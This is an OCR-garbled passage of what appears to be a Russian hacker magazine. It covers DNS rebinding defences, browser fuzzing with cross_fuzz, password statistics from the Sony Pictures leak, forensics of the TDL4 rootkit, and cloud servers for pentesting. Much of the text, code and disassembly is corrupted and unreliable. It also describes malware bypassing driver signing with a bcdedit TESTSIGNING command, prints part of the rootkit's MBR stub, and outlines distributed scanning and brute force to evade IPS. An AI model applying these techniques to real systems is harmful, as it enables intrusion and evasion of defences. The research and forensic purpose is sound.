адреса, атакующего на 80-й порт. 

10 ) Управляющий скрипт запрашивает адрес следующей цели, и 
процесс повторяется при необходимости. 

Для динамического создания ПМЭ-записей можно использовать 
механизм автоматического обновления ПМ5, например, утилиту 
пзирсіаіе. При ее использовании перезагрузка ПМЭ-сервера не 
потребуется. 

Защита от атаки типа ОМ5 
Кешпсііпд 

В принципе, есть несколько способов защититься от данного вида 
атак, например: 

1 ) Правильная настройка ПО сервера. Удалить на веб-серверах 
параметр ѴігІиаІНозІ со значением _сІе1'аии_, или *:80 и явно про- 
писать имена хостов. 

2 ) Защита со стороны разработчика веб-приложения. При уста- 
новке приложения предлагать пользователю ввести доменное 
имя сервера, на котором будет располагаться приложение, и 
обрабатывать запросы от клиента только в том случае, если пара- 
метр Но5І запроса НТТР соответствует имени домена, указанного 
при установке. 

3 ) В браузерах использовать плагин М05СРІРТ или аналоги, 
запретить выполнение скриптов ЗаѵаЗсгірІ, Заѵа-апплетов или 
ЕІазЬ-приложений. 

4 ) Использовать разделение зон, при котором скрипту, полу- 
ченному из внешнего интернета, будет однозначно запрещено 
обращаться к ресурсам, расположенным в локальной сети поль- 
зователя. 

При таком подходе однозначно уязвимыми остаются только уда- 
ленные сервисы, предоставляющие АРІ, для которых имя хоста не 
предусмотрено в принципе. Например, АРІ для работы с облаками 
на базе Атагоп ЕС2, или система виртуализации ѴМѵѵаге Е5Х. 
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Поиск уязвимостей в современных браузерах 
с помощью фаззинга 

• Эта статья - опыт использования фаззинга для поиска 
уязвимостей в современных браузерах. Авторы знают, о чем говорят: 
на прошедшей недавно конференции РНО они выиграли конкурс 
«Взломай и унеси». Взломали они За^агі (продемонстрировав 
рабочий Обаудля версии под №іпбоѵ\^$), а домой унесли призовой 
ноутбук. 



Введение в профессию 

Итак, приступим? Зафиксируем для порядка список существующих 
браузеров: 

• ѴѴіпсіоѵѵз Іпіегпеі Ехріогег (6/7/8) 

• Моііііа Ріге^ох (3*/4*) 

• Зоодіе СЬготе 

• 5а^агі 

• Орега 

• Орега Міпі 

• Меівсаре Маѵідаіог 

• Місіогі 

• 5куЛге 

• ОоІрЫп 

• Коприегог 

• ОооЫе 

Из них только три продукта являются ОрепЗоигее-проектами: это 
СЬготе, РігеЬх и Коприегог. Все браузеры спроектированы на основе 
некоторого базового функционала (епдіпе-движка). Вот перечень суще- 
ствующих ДВИЖКОВ: 

• Атауа 

• Оеско 

• НТМЕауоиІ 

• КНТМІ 

• Ргевіо 

• Ргіпсе 



• Тгісіепі 

• ѴѴеЬКіІ 

Например, Сбготе и Заі'агі построены на ОрепЗоигсе-движке ѴѴеЬКіІ, 
а популярный РігеЬх — на Оеско. Для работы ^аѵа5сгір1; используют 
движки данного интерпретатора, вот, например, в Ооодіе используется 
Ѵ8 (хотя есть еще РЫпо и БрісІегМопкеу). Также большинство браузе- 
ров поддерживают разные плагины, такие как І^іазб, ]Те (для работы с 
апплетами) — это дополнительные векторы атак. 

сОаззер для браузера 

Как и во многих других ситуациях, одним из самых эффектив- 
ных способов поиска уязвимостей в браузере является фаззинг. 
РІубличных и действительно работающих инструментов здесь не 
так много, но одним из таковых является замечательная разработ- 
ка сго55_1'и22 от Михаила Залевски. Миша работает в Ооодіе и с 
помощью своего фаззера обнаружил более ста багов во всех попу- 
лярных веб-браузерах, многие из них оказались эксплуатируемы. В 
его блоге ( ЬіІ.Іѵ/ІЬдІ'дпп ] есть даже отчет о найденных уязвимостях 
для Іпіегпеі Ехріогег, РігеЬх, Орега, а также браузеров на движке 
ѴѴеЬКіІ. Некоторые из найденных ошибок (даже несмотря на то, что 
разработчики поставлены в известность) до сих пор не устранены! 
При всей своей эффективности сго53_1'и22 устроен довольно просто. 
Фаззер выявляет проблемы путем создания чрезвычайно длинных 
закрученных последовательностей ВОМ-операций, которые затра- 
гивают сразу несколько документов. Проверяя возвращаемые объ- 
екты и вновь рекурсивно используя их, удается создавать круговые 



► обо 
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Креш ІЕ8 в отладчике 



Особенности анализа крешей 
5а!агі 



Важный момент. Если Заі'агі падаете исключением 
типа «Узег тобе ѵѵгііе ассеззѵіоІайопзіЬаІаге поі: пеаг 
МиіЕаге ехрІоіІаЫе», нужно посмотретьдизасм по еір. 

апб быогб р1:г б5 :0ВВАОВЕЕРІі^ 0 
хог еах^ еах 
саіі еах 

Если ты видишь что-то подобное, к сожалению, это 
ѴѴеЬкіЕовский макрос СВА5Н(). Такие падения сим- 
волизируют какую-то экстренную ситуацию, которая 
недолжна была произойти. Нотаккакмакрос СВА5Н 
просто так не вызывается, значит где-то произошла 
какая-то экстренная ситуация, которую обнаружили и 
поэтому прибили процесс. 



зависимости узлов, с помоідью которых устраивается 
настояідий стресс-тест для механизмов сборки мусора 
браузера. Таким образом, проверяется способность 
приложения к правильному и эффективному освобож- 
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Отчет от креше 



Открываем НТМЕ-страницу фаззера в каждом из них 



дению памяти для более неиспользуемых объектов. Как 
показывает практика, выдержать удар браузеру удается 
далеко не всегда :). Код сго53_1'и22 написан на НТМЕ/ 
^аѵа5сгір1; [ [сатІиЕсогебиппр.сх/сгозь Ьлі] . поэтому 



— и первые результаты не заставляют себя ждать. 
Удивительно, но при запуске сго53_1'и22 в Заі'агі, падение 
было моментальным — менее чем через 5 секунд. При 
тестировании ЕігеЬх 3.6.1 6 были падения через 15-30 



для фаззинга достаточно открыть нужный НТМЕ-файл минут после запуска. 

(есть разные варианты с незначительными отличиями) в В основном это были падения по ВЕР. Это своеобразный 



браузере. Чтобы нивелировать сетевые задержки, лучше 
всего скачать исходник на локальную машину. Не забудь 
при этом выкачать все зависимости (папку Да гдеіз и 
файлы тег5еппе.)5/1одо.)рд). Для корректной работы 
также потребуется включить рорир'ы в браузере. 



маркер уязвимостей изе-аі'іег-і'гее, креши на исполне- 
нии потенциально эксплуатабельны и поэтому ценны. 
Если поменять некоторые условия при запуске, можно 
уменьшить время срабатывания до 3-5 минут. При тести- 
ровании СЬготе падения были в дочернем процессе. ІЕ 



Начинаем практиковаться 

В качестве подопытных кроликов мы взяли наиболее рас- 
пространенные браузеры: 

• РігеЬх 3.6.16; 

• РігеЬх 4.0.1; 

• СИготе 10; 

• Іпіегпеі Ехріогег 8/9; 

• 5а^агі 5.0.5. 



же, что опять же удивительно, ничем не отличился. 

Все эти факты меня сильно удивили: я только начал 
исследовать браузеры, причем делал это публичным 
фаззером, а уже есть креши. Черт подери, сколько же 
там багов, если так быстро можно уронить почти любой 
браузер? Учитывая такие бодрые и быстрые результаты, 
я про себя отметил, что правильно выбрал вектор атаки. 
Сго55_1'и22 отлично игцет уязвимости в работе с ВОМ, и 
этим глупо не воспользоваться. 




Для анализа браузера 
можно использовать 
системы для автома- 
тического тестиро- 
вания приложений, 
такие какЭеІепіит 
( зеІепіитЬд.огд ). Этот 
инструмент эмулирует 
вседействия пользо- 
вателя, что можеттоже 
покрыть некоторый 
функционал браузера 
и привести кпадению. 




НТТР://ѴѴѴѴѴѴ 

"■ Г 

> Ііпкз 

• Про функционал 35 
(ВОМ) в браузерах: 
ѵѵѵѵѵѵ.ѵѵеЬбеѵоиЕпеІ:/ 
Ьгоѵѵзег-зиррогІ:- 
естазсгірЕ 

• Про векторы атак: 
Ьеібегі.сЬДзо . 

• Про тестирование 
браузеров, списки 
компонентов, брау- 
зеры под мобильные 
устройства и Т.Д.: 
ѵѵѵѵѵѵ.диігкзппобе.огд . 

• Про то, как устроен 
ЗапбЬох в гугловском 
СЬготе: беѵ.сЬго- 
тіит.огд/беѵеіорегз/ 
безідп-боситепіз/ 
запбЬох . 
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Включаем легирование 
и воспроизводим креши 

Алгоритм работы фаззера подразумевает генерацию огромного 
количества обращений к ООМ. Фаззеру приходится перебирать мно- 
жество вариантов, прежде чем браузер вылетит с ошибкой. Но нам 
мало просто крешнуть приложение — обязательно нужно понять, 
почему это произошло. Чтобы разобраться, какая последователь- 
ность вызовов вызывает креш, нужно включить режим легирования. 
Самый простой способ сделать это — чуть подредактировать исход- 
ники сго55_Ф22 и убрать геіигп из функции ШОІтеззаде). Убрав 
немедленный выход из функции легирования, мы добьемся того, что 
на странице сго55_Ф22 будут отображаться все вызываемые функции. 
К сожалению, сго55_Ф22 не умеет записывать эти данные в файл. Но 
для этих целей можно использовать плагины, например, РігеЬид для 
РігеФх. Для легирования чего-либо в ^5 нужно вставить следующий 
код: 

Игу { 

сопБОІе . 1о§( ' еѵаі %5 ' ^ пате) ; 

ге1:_ѵа1ие = еѵа1( Чаг^еИ. ' + пате + ' ( ' + раг_5І:г + ' ) ' 

} саИсб (е) { 

Я немного пропатчил РігеЬид, чтобы тот мог писать свой лог в файл 
(исправленный вариант ищи на нашем диске). В результате все дей- 
ствия фаззера (в том числе те, которые приводят к крешу) пишутся в лог 
в С:\Восиппеп1;5 апб ЗеШпдзѴизегпатеѴАррІісаІіоп □а1;а\Мо2іиа\Ріге1'ох\ 
РгоРІе5\ХХХХХХ.сІе1'аи11;\)5. Тот же самый трюк можно провернуть и в дру- 
гих браузерах, воспользовавшись соответствующими аддонами: 

• для СЬготе: РігеЬид Рііе Фг Ооодіе СЬготе (есть еще встроенный в 
СЬготе); 

• для Орега: Орега Вгадопйу; 

• для Заі'агі: ѴѴеЬКіШеѵеІорегЕхІгаз. 

РІосле этого мы можем изучить все, что происходило в сго55_Ф22, а, 
значит, и попытаться воспроизвести креши. 

Как анализировать креши? 

Уронить программу (пусть даже понимая, как) мало. Нам необходимо 
проанализировать креши и определить, эксплуатируемые они или нет. 
Эта тема настолько многогранна, что она явно выходит за рамки этого 
материала. Наша задача на сегодня — определить ошибки в програм- 
ме, которые теоретически можно эксплуатировать. А о том, как пишутся 
сплоиты, обходятся песочницы и защитные механизмы вроде ОЕР/ 
А5ЕР в журнале было немало статей (хотя одних только материалов 
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Для корректной работы фаззера нужно не забыть про 
его вспомогательные файлы 



журнала ][тут, по правде говоря, недостаточно). Могу лишь дать пару 
полезных советов. Когда разбираешь креши в таких немаленьких 
программах как браузеры, немало нервов и времени спасают так 
называемые отладочные символы. Эта информация позволяет чело- 
веку использовать «символические» (отладочные) данные о двоичном 
файле, такие как имена переменных, процедур и функция из исходного 
кода. Эта информация может быть крайне полезной во время поиска 
ошибок в исходном коде, отладке программы и разного рода отказах. 
Чтобы не включать ее в бинарный файл, разработчики выкладывают 
отладочную информацию в виде отдельных файлов или на специаль- 
ном сервере отладочной информации. В случае браузеров ее, увы, не 

так МНОГО: 

• для Іпіегпеі; Ехріогег ( тгІ.Іа/тСбХРб ): 

• для ЕігеФх ( Ьіиѵ/|іНЬОА ). 

При проверке отладочных символов для Эаі'агі ( Ьіиу/]іНЬОА ) выяс- 
нилось, что для ключевых модулей (ѴѴеЬкіЕсИІ, ^аѵа5сгір1;Соге.сIи) 
отладочная информация на сервере отсутствует. Поэтому, чтобы 
получить ее, придется собирать ѴѴеЬКіІ самому. Исходники всегда 
доступны здесь — зѵп.ѵѵеЬкіІ.огд/герозіІогѵ/ѵѵеЬкіІ: . а инструкция для 
сборки здесь — Ігас.ѵѵеЬкіІ.огд/ѵѵікі/ВиіІсІіпдОпѴѴіпсІоѵѵз . Еще один 
совет касается отладки СЬготе. По умолчанию этот браузер создает 
для каждой вкладки отдельный процесс, что для нас не подходит. 
Поэтому его лучше запускать с ключом «--зіпдіе-ргосезз»: в этом 
режиме все вкладки будут запущены в единственном процессе. Что 
касается анализа крешей в Эаі'агі, для которого мы и написали Обау- 
сплоит, то тут есть еще один нюанс — подробнее о нем ты можешь 
прочитать во врезке. 

Результаты фаззинга 

Что получилось в результате нашего исследования? 

РігеЬх третьей ветки: 

Есть креши, но их не получилось воспроизвести, даже зная весь лог во 
время падения. Уязвимость сильно связана с состоянием динамиче- 
ской памяти (Ьеар). 

РігеЬх, ветка четыре: 

Крешей не было зафиксировано. 

СИготе: 

Есть креши, но их не получилось воспроизвести — такая же история, 
как и с ЕігеФх третьей ветки. 

Ба^агі: 

Креши были, воспроизвести можно. Сплоит написан :). 

Браузеры — это очень сложное ПО. Поэтому нет ничего удивительного, 
что в них есть уязвимости. Всем известно: безопасность обратно про- 
порциональна объему и сложности кода. У браузера очень много век- 
торов атаки: чего стоит один только 5Ѵ0, про который в этой статье не 
упоминалось. Большая часть крешей, вызванных фаззером, не являют- 
ся гарантией успеха и завязаны на большом числе факторов состояния 
кучи и многих других параметров. Из этого можно сделать вывод, что 
для реализации на 100% надежного сплоита нужно потратить очень 
много сил, времени и нервов. Тем не менее, используя данную методи- 
ку, вполне можно найти уязвимости в браузере, что мы доказали, обна- 
ружив уязвимость нулевого дня в Эаі'агі на Розіііѵе Наск Вауз. 



► 0б2 
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ОѴШѴ. 12345, 6РШКМ 

Наделавшие много шума хакерские группы Апопуппоиз и Іиіізес своими выходками подкидывают высококачественный 
материал для различных исследований. Так, через ІоггепТы без труда можно скачать базу пользователей 5опу Рісіигез, из 
которой в открытом виде извлекается почти 40 тысяч паролей пользователей. На основе этой вполне репрезентативной 
выборки программист Трой Хант ( \л/\л/\л/.1гоубип1.сот) сделал интересный анализ паролей. 
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Чем длиннее пароль, тем он надежнее. У 93% аккаунтов длина пароля варьиру- 
ется от 6 до 10 символов (видимо, по минимальной длине действует требование 
сервиса), но при этом у 50% пользователей он менее 8 символов. Здравствуй, 
брутфорс и радужные таблицы. 




Сложность пароля непременно определятся симво- 
лами, которые в него входят. Однако половина пассов 
состоит из символов одного типа, то есть либо только 
нижнего реестра, либо только из букв верхнего 
регистра, либо только из чисел. 
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Что может быть хуже, чем словарный 
пароль? Исследователь взял словарь 
на 1,7 миллиона слов [ сіаггіеросі.сопп/ 
зііе тесІіаЛхі/раззѵѵогсІз.ІхІ: ) и посмо- 
трел, сколько паролей в него «попало». 
Оказалось, больше трети используемых 
пассов — словарные! 



Хороший вопрос: «Используют ЛИ пользова- 
тели уникальные пароли для разных серви- 
сов?». Поскольку в базу 5опу Рісіигез вклю- 
чены пароли для различных сервисов, мы 
можем посмотреть пересечение пассов для 
одного итого же пользователя. Оказалось, что 
92% юзеров используют один и тот же пароль. 



В случае с Зону Рісіигез все пароли храни- 
лись в открытом виде (хотя такое сложно даже 
представить!), но даже если бы онибылизахе- 
шированы,то82%хешей непременно бы сда- 
лись под напором радужных таблиц ( рго)есі:- 
гаіпЬоѵусгаск.сот ). Это пароли из букв и цифр 
меньше 9 символов длиной. 
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Криминалишческая 
ругкит-программ на 



я экспертша и 
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анализ 



@ Согда организаторы РНО'2011 предложили выступить с мастер- 
классом, мы с моим коллегой Евгением Родионовым работали над 
исследованием руткита семейства Оітагік (Т014). В рамках РНВ нам 
хотелось рассказать нечто интересное, что ранее было плохо 
освещено или вообще не затронуто. 



Учитывая, что я уже не раз писал в журнале на данную тему, мы 
сконцентрировались на двух новых вещах. Первая — внедрение рут- 
кита на х64-системы в обход проверки цифровой подписи, а вторая 
— то, каким образом подходить к криминалистической экспертизе 
уже зараженных машин. 

Обход проверки 
цифровой пс5дписи 

На 64-битных версиях операционных систем М5 ѴѴіпсІоѵѵз (Ѵізіа, 
ѴѴіп7) все модули, загружаемые на уровень ядра, должны иметь 
обязательную цифровую подпись, причем выданную не абы кем. 

Из известных сейчас способов обхода этой проверки во вредо- 
носных программах используются в основном достаточно прими- 
тивные техники. К примеру, руткит-драйвер из семейства ѴѴіп64/ 
Тго]апПоѵѵп[оасІег.Месиг5, подписан тестовой цифровой подписью и 
устанавливается при помощи того, что его дроппер (с учетом нали- 
чия соответствующих прав доступа) вносит изменения (Всбесііі.ехе 
-зеі ТЕ8Т8І0МІМ0 ОМ) в Вооі Сопбдигаііоп Ваіа (ВОВ) для загрузки 
системы в специальном режиме ТЕ8Т8І0МІМ0. Именно эти мани- 
пуляции и позволяют загрузить вредоносный драйвер в обход всех 
проверок. Аналогичная техника применяется и в ѴѴіп64/8ру.Вапкег, 
но разработчики руткита ТОЕ4 использовали более технологичный 
и интересный способ обхода при помощи буткит модуля и много 
итерационных модификаций в процессе загрузки самой операци- 
онной системы. 

В процессе своей установки дроппер ТОЕ4 подготавливает специ- 
альный контейнер своей скрытой файловой системы и записывает его 
в конец жесткого диска, а также вносит модификации в МВР (Мазіег 
Вооі РесогсІ), после чего вызывает недокументированную функцию 
2ѵѵРаІ5еНагсІЕггог(), которая вызывает В800 и вынужденную переза- 
грузку системы. Процесс загрузки операционной системы выглядит 
следующим образом (см. рис. 1). 

Как видно из этой схемы, все начинается с выполнения кода МВР, в 
нашем случае МВР был модифицирован. Ниже приведена модифици- 
рованная загрузочная запись (см. рис. 2). 

Видно, что вначале используется нехитрая техника самомодификации 
кода, где при помощи ассемблерной команды циклического сдвига 



(ВОР) происходит расшифрование остальной части кода и передача 
управления на него. Вторая ступень на пути к обходу проверки циф- 
ровой подписи — это передача управления на модуль 1с1г16, который 
считывается из файловой системы руткита. 

Одной из задач 1с1г16 является модификация параметров ВОВ на 
лету, то есть прямо в процессе загрузки операционной системы. Эти 
самые параметры выглядят следующим образом (см. рис. 3). 
Наибольший интерес Шгіб проявляет к параметру 
ВссІ08ЕоасІегВооІеап_Ѵ\/іпРЕМосІе (0x26000022), который отвеча- 
ет за загрузку операционной системы в так называемом режиме 
ргеіпзіаиаііоп тобе, в котором все проверки целостности отключе- 
ны. Отключить эти проверки необходимо для загрузки модифициро- 
ванной системной библиотеки кбсот.бИ, которая отвечает за связь 
между ядром операционной системы и отладчиком ѴѴіпОЬд. После 
успешной загрузки модифицированной кбсот.бИ в виде модуля 
1бг32 или 1бг64, в зависимости от разрядности операционной систе- 
мы, происходит модификация параметра /МІМІМТ, с умышленной 
ошибкой превращая его таким образом в невалидный параметр М/ 
N1, что приводит к загрузке системы в нормальном режиме. 

Но возникает вполне закономерный вопрос: зачем же происходит 
загрузка модифицированной библиотеки кбсот.бИ? Здесь кроет- 
ся интересный нюанс, который заключается в том, что в процессе 
загрузки ядра происходит вызов функции КбОеЬиддегІпібаІігеІ О, 
которая как раз экспортируется из кбсот.бИ, и в нее внесены инте- 
ресные изменения. А точнее, сразу после ее вызова произойдет 
вызов функции РзЕеіЕоабІппадеМоІіІ'уРоиІіпеО, которая устанавли- 
вает обработчик на загрузку исполняемого образа в память. А сам 
этот обработчик содержит вызов недокументированной функции 
ІоСгеаІеОгіѵегО, которая создает и инициализирует объект-драйвер. 
Все вышеописанное шаманство позволяет протащить в ядро и 
загрузить неподписанный драйвер. Если все это изобразить в виде 
схемы, то она будет выглядеть так (см. рис. 4). 

Здесь стоит отметить, что со стороны М8 была попытка противо- 
действия описанному способу обхода проверок цифровой подписи, 
и в конце весны был выпущен патч КВ2506014, который не позволял 
больше использовать ѴѴіпРЕМобе и загружать модифицированную 
библиотеку кбсот.біі. Но спустя буквально несколько дней, появи- 
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[1] Процесс загрузки операционной системы 
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[3] Параметры Воо! СопЯдигаІіоп Оаіа 



лась модификация ѴѴіп32/0[ппагік.АММ, которая уже умела обходить 
этот патч :). 

Криминалистическая экспертиза 

Файловая система руткита представляет собой скрытый контейнер, 
дописанный в конец жесткого диска. В этом контейнере и хранятся 
все компоненты руткита и конфигурационный файл с командными 
центрами. 

Именно поэтому она представляет наибольший интерес с точки зре- 
ния криминалистической экспертизы. Но каждый раз доставать и 
расшифровывать этот скрытый раздел достаточно муторно, поэтому 
для автоматизации процесса нами была разработана специальная 
утилита ТбІРзРеабег [езеІ.гиЛооІз/ТбІРзРеабег.ехе І. Она находится 
в свободном доступе и поддерживает все известные модификации 
этого руткита, начиная с версии ТВРЗ. Если посмотреть на ее внутрен- 
не устройство, то она состоит из нескольких компонентов: 

• определение версии руткита и алгоритма шифрования файловой 




зЬагі 


ргос 


Раг 


; СООЕ ХПЕГ: 




ког 


ахт 


ах 




пои 




ах 




поо 




7стп 




пои 


05 , 


ах 




пои 




ах 




пои 




7С0ОИ 




пои 


ОІт 


6 08И ; сору пЬг ^0 П 011 ЬиРР0г 




пои 


СХ^ 






с1<1 








гер гшизЬ 






ри^іі 


ах 






ризИ 


61 СИ 




геЕР 








опіір 








5РІ 








ризИі 








пои 


сх. 






пои 


Ьр, 


62ЙГ1 








■ СаОЕ ХЙЕЕ: 




ГОГ 


Ьу^ 


0 рЬг [Ьр*Ѳ], с1 ; Оосгурі: іпРгсРеО пЬг соОе 




іпс 


Ьр 






Іоор 


ІО С 


_2Ч ■ ОесгурС ІпЕосСеО пог сой 0 




пои 


05: 


7Н2Ь, ІІ1 




15 иЬ 


«о г 


й р1:г ЮИ ^ Г05рги0 пепогу Рог 10г1й 




пои 


дХ, 


йз:4іЭИ 




згіі 


ах^ 


6 




пои 


05: 


й71іГі, ах 




пои 


аИ, 


- ‘Н“ 




пои 


зі» 


ѲС^Гі 




пои 


моггі рЬг іі5:8С5іі, 1Еіі ; дрі: гіІ5к сарасіігу | 



[2] Модифицированная загрузочная запись 




[4] Схема загрузки неподписанного драйвера 






3 : \ >Т (і 1Р$ Ре айе 1* - е хе 
;ѳп(еп($ о( ТРЬ Еііе $у8(еп: 

с^д.іпі ПР5: В8С8В1В5С01ЕВР2Р48760Р2Е06С402Е6 
пЬг МВ5: ЙР1ЕС9В9С5СЕ1В74ВЗВ9СЙЗВВЕ0РА941 
ЬскГд.іпр ИВ5: 6ЙВ76461ЕЕВ59Й1В77529В595В3672ЕВ 
спа.аИ П05: 4ВЙВЕВ6С7ЕРР7230В68ЙЕ48В02Й847РЙ 
іагіб МВБ: 4РВ9748189Р6688ЙВЙ9Й51Й5901408РЙ 
іаг32 МВБ: С078ЕБЕЙ19Р8БЗЙС0830В2Р6088Р7161 
іаг64 МВБ: ЙВЕВ890ВБ64913Р11301С648ЙБРВ6220 
аги64 МВБ: 87Й462В034192ЕВВ60ЙСЕ83БЕ91В930В 
спаб4.аі1 ИВБ: ВСЗВ9РВ8ЕЙРВ440В43В76ВС12РВ44БС7 
а^и32 МВБ: 1ЕР0Е0С76БВЙ7Р727Е1ЕВ8РР38В02РР1 



[5] Утилита ТсІІРзРеасІег извлекает дамп файловой систе- 
мы руткита 



системы; 

• парсера файловой системы и алгоритма расшифрования файлов 
внутри нее; 

• противодействие механизмам самозаідиты руткита; 

• чтение жесткого диска на низком уровне. 

В результате работы ТбІРзРеабег мы получаем полный дамп скрытого 
раздела файловой системы руткита. 

Подобные улики в виде конфигурационного файла, содержаідего 
адреса командных центров и его активных компонентов, являются 
интересным материалом, который может дать дополнительные векторы 



развития для расследования. Более того, даже после удаления боль- 
шинством лечаідих утилит активного заражения ТВЕ4, скрытый раздел 
файловой системы все равно остается на жестком диске, и из него 
также можно получить информацию. 

В качестве заключения хочется заметить, что уже на протяжении 
нескольких лет семейству ТОЕ удается удерживать технологическое 
первенство среди распространенных в «живой природе» руткит- 
программ. Посмотрим, что принесет дальнейшее его развитие, и чем 
нас удивят его авторы в будуідем. ^ 
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Облачные вычисления на службе у пентестера 



• Огромные вычислительные мощности облачных инфраструктур 
открывают перед пентестерами и блекхатами множество новых 
возможностей. Сегодня мы посмотрим на сіоиб сошриііпд с новой 
стороны и рассмотрим конкретные кейсы использования облачных 
мощностей для взлома и пентестинга. 



Іаа$ на службе у хакера 

Облачные вычисления представлены для пользователя следую- 
щими услугами: 

• 5аа5 (Зоі'іѵѵаге аз а Зегѵісе) 

• Раа5 (РІаіЬгт аз а Зегѵісе) 

• ІааЗ (1п[газ1;гис1;иге аз а Бегѵісе) 

• Наа5 (Нагсіѵѵаге аз а Бегѵісе) 

• ѴѴааБ (ѴѴогкрІасе аз а Бегѵісе) 

• ІааБ (1п[газ1;гис1;иге аз а Бегѵісе) 

• ЕааБ (ЕѵегуіЬіпд аз а Бегѵісе) 

• ОааБ (Оаіа аз а Бегѵісе) 

• БааБ (Бесигііу аз а Бегѵісе) 

В первую очередь нас интересует сервис ІааБ, так как он предо- 
ставляет в данный момент наиболее востребованную и «реа- 
листичную» среду для пентестера. Сервис ІааБ предоставляет 
пользователю возможность создания виртуального сервера на 
основе оборудования провайдера облачных вычислений. Самое 
очевидное преимущество данного сервиса — практически нео- 
граниченные возможности по масштабированию вычислительных 
мощностей. Что же такое сервис ІааБ для пентестера? 

Это уникальная возможность использовать десятки идентичных 
по возможностям серверов с целью эффективной реализации 
классических задач в области пентеста: 

• обман ІРБ при удаленном сканировании портов; 

• распределенный перебор паролей; 

• атаки на отказ в обслуживании; 

• сканирование сетевого периметра; 

• автоматизированный поиск уязвимостей. 

Само собой, использование инновационных технологий облачных 
вычислений может быть направлено как в полезное русло, так и в 
не очень полезное. Как плохие парни могут использовать сервис 
в своих целях? Этот вопрос мы постараемся рассмотреть в дан- 
ной главе на примере наиболее частых злоупотреблений. 



Анонимность 

Вопрос анонимности при использовании сервисов облачных 
вычислений стоит крайне остро. Дело в том, что вся информация, 
которая необходима для получения доступа к такого рода серви- 
сам, ограничивается лишь номерами кредитной карты и сотового 
телефона. Большинство провайдеров верят пользователю «на 
слово» и не задумываются в настоящий момент о вопросах, воз- 
никающих после того, как их сервис стал одной из ключевых 
цепочек в истории взлома какого-либо ресурса. 

Чтобы выгодно продать свои услуги, провайдеры охотно пред- 
лагают пользователям промо-программы, предоставляющие 
возможность бесплатного использования сервисов в течение 
определенного промежутка времени. Вся информация о пользо- 
вателе, получившем доступ к сервису, в таком случае сводится к 
адресу электронной почты и ІР-адресу, который был использован 
пользователем для управления услугами. Совершенно понятно, 
что в этих условиях существует много способов абсолютно ано- 
нимного использования облачных мощностей. 

Сетевая разведка 

Термин «сетевая разведка» подразумевает под собой мероприя- 
тия, направленные на автоматизированный сбор информации 
для дальнейшего анализа. Облачные вычисления позволяют 
создать отличную площадку для проведения такого рода меро- 
приятий, потому что обеспечивают несколько важных факторов, 
которые необходимы для автоматизации сбора данных. А именно: 
разные ІР-адреса, с которых производится сбор данных, скорость 
канала связи и вычислительные ресурсы, позволяющие быстро 
обрабатывать полученную в результате сбора данных информа- 
цию. 

Сканирование портов 

Использование возможностей сервиса ІааБ позволяет злоумыш- 
леннику преодолевать такие защитные средства, как ІРБ/ЮБ. 



► 066 
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Интерфейс ЕС2: 
запущено 20 инстантов 



Идея возможности скрытого от ІР5/І05 сканирования портов на 
удаленной системе заключается в том, что сканирование про- 
ходит с более чем десятка различных ІР-адресов с временными 
интервалами, по частям. В результате — даже хорошо настроен- 
ная ІР5/Ю5 не сможет идентифицировать событие сканирова- 
ния портов, а если идентифицирует его, то заблокирует только 
один ІР-адрес из множества адресов, сканируюідих серверов. 
Естественно, для реализации такой задачи необходимо раз- 
работать программное обеспечение, позволяюідее удаленно 
управлять процессами на серверах, запуіденных на плоідадке 
провайдера облачных вычислений. 

Проведение атак 

1аа5-плош,адки идеально подходят и для атак на удаленные 
сервисы. Например, для перебора паролей, а также различных 
видов сііепі-зісіе-атак. Во-первых, на плоідадке достаточно 
легко и просто «развернуть» любой боевой арсенал, например, 
теіазріоіі; или сапѵаз. Во-вторых, перебор паролей может быть 
осуідествлен распределение, как и в случае со сканированием 
портов удаленного хоста, во избежание блокировки ІР-адреса 
атакуюідего. В третьих, плоідадка ІааЗ может послужить отлич- 
ным посредником между атакуюідим и целью с точки зрения того, 
что история всех действий, совершенных с плоідадки ІааЗ, будет 
уничтожена после выключения сервера. 

Брутфорс 

Возможность использовать условно «неограниченные» ресурсы 
облачных вычислений позволяет продуктивно проводить меро- 
приятия по брутфорсу хешей и генерации радужных таблиц с 
последуюідим восстановлением по ним зашифрованных строк. 
Явным плюсом генерации радужных таблиц на базе облачных 
сервисов является возможность использования огромного 
устройства хранения данных. На практике генерация радужных 
таблиц для алгоритма пит (тіхаІрЬа-питегіс-аІІ-зрасе, 8 симво- 
лов) сводится только к вопросу времени и финансовым затратам. 
Для генерации такой таблицы на топовом домашнем компьютере 

ТАБЛИЦА 1 




Подключение к инстанту по ззіі 

потребуется порядка 1290 лет. В случае же облачных вычислений, 
прямо здесь и сейчас можно купить «машину времени», которая 
будет создаваться примерно 1,5 года и ее стоимость составит 
порядка $320к. Я хочу сказать, что такую таблицу, используя 
облачные вычисления, на практике можно создать всего за 1,5 
года. В таблице 1 показана детальная статистика по финансовым 
затратам для такой разработки. В данном случае использовалось 
20 серверов со следуюідими техническими характеристиками: 2 х 
Іпіеі Хеоп Х5570 риасі-соге «МеЬаІет» агсЫіесІиге, 2 ядра МѴісІіа 
Тезіа М2050, 23 Гб ОЗУ. 

Цифры говорят о том, что пора менять парольную политику — 
расшифровать МТЕМ-хеш пароля из 8 символов вполне реально 
и доступно для плохих парней. Но это только теория. На практике 
же политика безопасности паролей более лояльна и ограничи- 
вает пользователя лишь длиной пароля — 8 символов в лучшем 
случае. Статистика используемых паролей в крупных компаниях, 
составленная Дмитрием Евтеевым и приведенная в его докладе 
«Анализ проблем парольной заідиты в российских компаниях» 
[ т-ѵ\л/.рІ5есигіІѵ.ги/сіо\л/п[оасІ/РТ-Ме1:гіс5-Ра55\л/огсІ5-2009.рсіЯ . 
говорит о том, что большинство пользователей всеми возможны- 



Необходимый ресурс 


Качество 


Стоимость 


Общая стоимость 


Работа одного Іпзіапсе 


20 


$6590 + $0,56/Иоиг 


20 * $6590 = $131 800 
$ 0,56 * 20 * 12834 = $ 143 740 


Оаіа ЗІогаде 


418 ТЬ 


$ 102 / ТЬ 


$ 102 * 418 =$ 42 636 




Итого: 




$ 318 176 
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Характеристика радужной таблицы 


Требуемое 

время 


Стоимость 


Цифры (от 1 до 12 символов) 


3 часа 


$103 


Символы английского (Іоѵѵ-сазе) алфавита (от 1 до 12 символов) 


21 год 


$ 2 363 252 


Символы английского алфавита (от 1 до 11 символов) 


275 суток 


$ 754 064 


Символы английского алфавита (Іоѵѵ-сазе) (от 1 до 10 символов) 


11 суток 


$9 823 


Символы английского алфавита (Іоѵѵ-сазе) и цифры (от 1 до 12 символов) 


1046 лет 


$ 80 919 507 


